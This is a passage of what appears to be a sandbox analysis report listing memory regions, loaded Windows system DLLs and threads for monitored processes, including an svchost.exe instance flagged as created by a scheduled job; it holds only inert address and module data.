entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 985
start_va = 0x150000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 986
start_va = 0x7d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 987
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 988
start_va = 0x7ffc53880000
end_va = 0x7ffc538d8fff
monitored = 0
entry_point = 0x7ffc5388fbf0
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 989
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 990
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 991
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 992
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 993
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 994
start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 995
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 996
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 997
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 998
start_va = 0x7ffc5e810000
end_va = 0x7ffc5e84afff
monitored = 0
entry_point = 0x7ffc5e8112f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 999
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1000
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1001
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1002
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1003
start_va = 0x8e0000
end_va = 0xa67fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008e0000"
filename = ""
Region:
id = 1004
start_va = 0xa70000
end_va = 0xbf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 1005
start_va = 0xc00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c00000"
filename = ""
Region:
id = 1006
start_va = 0x2000000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1007
start_va = 0x600000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1008
start_va = 0x7ffc5cc80000
end_va = 0x7ffc5e1defff
monitored = 0
entry_point = 0x7ffc5cde11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1009
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1010
start_va = 0x7ffc5c3c0000
end_va = 0x7ffc5ca03fff
monitored = 0
entry_point = 0x7ffc5c5864b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1014
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1015
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1016
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1017
start_va = 0x7ffc5cb50000
end_va = 0x7ffc5cc04fff
monitored = 0
entry_point = 0x7ffc5cb922e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1018
start_va = 0x7ffc5e7b0000
end_va = 0x7ffc5e801fff
monitored = 0
entry_point = 0x7ffc5e7bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1019
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1020
start_va = 0x7ffc5a7b0000
end_va = 0x7ffc5a845fff
monitored = 0
entry_point = 0x7ffc5a7d5570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1021
start_va = 0x2000000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1022
start_va = 0x2140000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 1023
start_va = 0x2150000
end_va = 0x2486fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1024
start_va = 0x2490000
end_va = 0x26adfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002490000"
filename = ""
Region:
id = 1025
start_va = 0x26b0000
end_va = 0x28c9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 1026
start_va = 0x2000000
end_va = 0x2111fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1027
start_va = 0x2120000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 1028
start_va = 0x28d0000
end_va = 0x2ae2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 1029
start_va = 0x2af0000
end_va = 0x2bfafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 1030
start_va = 0x640000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1031
start_va = 0x7ffc5eac0000
end_va = 0x7ffc5ec19fff
monitored = 0
entry_point = 0x7ffc5eb038e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1032
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1033
start_va = 0x7d0000
end_va = 0x88bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 1034
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1035
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1036
start_va = 0x7ffc59dc0000
end_va = 0x7ffc59de1fff
monitored = 0
entry_point = 0x7ffc59dc1a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1037
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1038
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1039
start_va = 0x60000
end_va = 0x66fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1040
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1041
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 1042
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1043
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1044
start_va = 0x1f0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 1045
start_va = 0x680000
end_va = 0x680fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 1046
start_va = 0x690000
end_va = 0x691fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 1047
start_va = 0x7ffc52e60000
end_va = 0x7ffc530d3fff
monitored = 0
entry_point = 0x7ffc52ed0400
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")
Region:
id = 1048
start_va = 0x6a0000
end_va = 0x6a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1049
start_va = 0x6b0000
end_va = 0x6b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Thread:
id = 14
os_tid = 0xec
Thread:
id = 15
os_tid = 0xbf0
Thread:
id = 16
os_tid = 0xdc8
Thread:
id = 17
os_tid = 0x1364
Process:
id = "4"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x75fd1000"
os_pid = "0x344"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a36c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1074
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1075
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1076
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1077
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1078
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1079
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1080
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1081
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1082
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1083
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1084
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1085
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1086
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1087
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1088
start_va = 0x500000
end_va = 0x500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 1089
start_va = 0x510000
end_va = 0x510fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1090
start_va = 0x520000
end_va = 0x521fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dosvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui")
Region:
id = 1091
start_va = 0x530000
end_va = 0x536fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 1092
start_va = 0x540000
end_va = 0x540fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "usocore.dll.mui"
filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")
Region:
id = 1093
start_va = 0x550000
end_va = 0x551fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1094
start_va = 0x580000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000580000"
filename = ""
Region:
id = 1095
start_va = 0x640000
end_va = 0x640fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 1096
start_va = 0x650000
end_va = 0x650fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 1097
start_va = 0x660000
end_va = 0x6dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 1098
start_va = 0x6f0000
end_va = 0x6f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 1099
start_va = 0x700000
end_va = 0x706fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1100
start_va = 0x740000
end_va = 0x78efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1101
start_va = 0x790000
end_va = 0x790fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 1102
start_va = 0x7a0000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 1103
start_va = 0x7c0000
end_va = 0x7c3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1104
start_va = 0x7d0000
end_va = 0x7d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 1105
start_va = 0x7e0000
end_va = 0x7e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1106
start_va = 0x800000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 1107
start_va = 0x900000
end_va = 0xa87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 1108
start_va = 0xa90000
end_va = 0xc10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 1109
start_va = 0xc20000
end_va = 0x101afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c20000"
filename = ""
Region:
id = 1110
start_va = 0x1020000
end_va = 0x109ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 1111
start_va = 0x10a0000
end_va = 0x10a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "activeds.dll.mui"
filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")
Region:
id = 1112
start_va = 0x10b0000
end_va = 0x10b4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 1113
start_va = 0x10e0000
end_va = 0x10e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010e0000"
filename = ""
Region:
id = 1114
start_va = 0x10f0000
end_va = 0x11effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010f0000"
filename = ""
Region:
id = 1115
start_va = 0x11f0000
end_va = 0x11f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011f0000"
filename = ""
Region:
id = 1116
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 1117
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 1118
start_va = 0x1400000
end_va = 0x1736fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1119
start_va = 0x1740000
end_va = 0x183ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001740000"
filename = ""
Region:
id = 1120
start_va = 0x1840000
end_va = 0x193ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001840000"
filename = ""
Region:
id = 1121
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 1122
start_va = 0x1a00000
end_va = 0x1afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 1123
start_va = 0x1b00000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 1124
start_va = 0x1c00000
end_va = 0x1cdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1125
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1126
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1127
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1128
start_va = 0x2000000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1129
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1130
start_va = 0x2200000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1131
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1132
start_va = 0x2400000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 1133
start_va = 0x2500000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1134
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 1135
start_va = 0x2700000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 1136
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 1137
start_va = 0x2900000
end_va = 0x2944fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 1138
start_va = 0x2950000
end_va = 0x29ddfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 1139
start_va = 0x29e0000
end_va = 0x2a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 1140
start_va = 0x2ac0000
end_va = 0x2ac6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 1141
start_va = 0x2af0000
end_va = 0x2af6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 1142
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1143
start_va = 0x2c00000
end_va = 0x2c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 1144
start_va = 0x2c80000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 1145
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 1146
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 1147
